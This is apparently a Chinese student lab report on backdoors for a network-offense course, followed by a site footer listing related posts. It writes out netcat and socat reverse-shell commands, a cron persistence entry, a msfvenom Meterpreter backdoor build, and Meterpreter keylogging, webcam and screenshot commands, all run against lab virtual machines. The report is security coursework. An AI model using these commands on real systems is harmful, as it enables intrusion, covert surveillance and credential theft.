20145307陈俊达《网络对抗》Exp2 后门原理与实践
20145307陈俊达《网络对抗》Exp2 后门原理与实践
基础问题回答
例举你能想到的一个后门进入到你系统中的可能方式?
非正规网站下载的软件 脚本 或者游戏中附加的第三方插件
例举你知道的后门如何启动起来(win及linux)的方式?
自启动型木马,windows计划任务
Meterpreter有哪些给你映像深刻的功能?
自动制作后门这点很厉害,黑客只需要输入命令即可,键盘录入器这是最致命的,你所有的密码都会被发现并记录
如何发现自己有系统有没有被安装后门?
及时安装可靠的防火墙
常用后门工具实践
Windows获得Linux Shell
在Windows下,先使用ipconfig指令查看本机IP,使用ncat.exe程序监听本机的5307端口:

在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5307端口:

Linux获得Windows Shell
过程与之前的类似,使用nc指令监听5307端口:

实验内容
使用netcat获取主机操作Shell,cron启动
先在Windows系统下,监听5307端口
用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行:
在最后一行添加30 * * * * /bin/netcat 192.168.79.130 5307 -e /bin/sh,意思是在每个小时的第30分钟反向连接Windows主机的5307端口

使用socat获取主机操作Shell, 任务计划启动
基础知识
socat是ncat的增强版,它使用的格式是socat [options]
实践过程
在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5307 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5307,同时把cmd.exe的stderr重定向到stdout上:

创建完成之后,注销用户,并再次登录
此时,在Kali环境下输入指令socat - tcp:192.168.79.130:5307,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5307端口,此时可以发现已经成功获得了一个cmd shell:

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.79.128 LPORT=5307 -f exe > 20145307_backdoor.exe生成后门程序,通过nc指令将生成的后门程序传送到Windows主机上
在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:

设置完成后,执行监听:

打开Windows上的后门程序此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权,使用record_mic指令可以截获一段音频,使用webcam_snap指令可以使用摄像头进行拍照,使用webcam stream指令可以使用摄像头进行录像,使用screenshot指令可以进行截屏,使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录
对对对,但是我用的win7虚拟机,没摄像头驱动,没麦克风驱动,但是屏幕截图还是可以做的吗!截个图表示我这个鬼东西做出来了 是能用的


20145307陈俊达《网络对抗》Exp2 后门原理与实践的更多相关文章
- 20155331 丹增旦达 网络攻防 Exp2后门原理与实践
20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155323刘威良 网络对抗 Exp2 后门原理与实践
20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...
- 20155302 Exp2 后门原理与实践
20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...
- 2017-2018-2 20155314《网络对抗技术》Exp2 后门原理与实践
2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或net ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
随机推荐
- 宏(define)与常量(const)
http://mp.weixin.qq.com/s?__biz=MzAxMzE2Mjc2Ng==&mid=402470669&idx=1&sn=e34db91190d8d46f ...
- activemq 实战 一
This chapter covers Introduction to the use case for each of the book examples Use of Maven for ...
- Android 7.1 SystemUI--Multi-Window多窗口模式
PhoneStatusBar.java private View.OnLongClickListener mRecentsLongClickListener = new View.OnLongClic ...
- [HNOI2004] 打砖块
1292. [HNOI2004] 打砖块 ★★ 输入文件:brike.in 输出文件:brike.out 简单对比时间限制:1 s 内存限制:128 MB [题目描述] 在一个凹槽中放 ...
- mysql数据类型及存储过程
转自:http://www.cnblogs.com/mark-chan/p/5384139.html 存储过程简介 SQL语句需要先编译然后执行,而存储过程(Stored Procedure)是一组为 ...
- Thinkphp的cookie的怎么玩?
在使用COOKIE的时候,首先要对COOKIE进行加密,加密方式采用:异位或的方式进行加密: // 异位或加密 1是加密 0 是解密 function encrytion($value,$type=0 ...
- Pandas介绍
pandas是python非常好用的一个数据结构包,包含有许多数据操作的方法,能够让你快速简便的提取和保存数据,节省你在这块的数据流操作耗时,从而让你更加专注于逻辑的设计和算法的设计.很多算法的相关库 ...
- Oracle HA 之 OGG部署流水
1.GG组件及其功能简介: manager进程:总管其他所以进程及处理相应GGSCI命令. capture进程:从源端的联机日志文件或归档日志文件抓取commit的信息. sourc ...
- 洛谷P3067 平衡的奶牛群 [USACO12OPEN] meet-in-the-middle
正解:搜索 解题报告: 先放下传送门QwQ 这题就,双向搜索经典题鸭 首先dfs应该挺好想到的我jio得?就是我们不用记录左右分别得分多少只要记下差值就好了嘛能get? 然后就先搜左边,记录下每个得分 ...
- SQL基础--查询之一--单表查询
SQL基础--查询之一--单表查询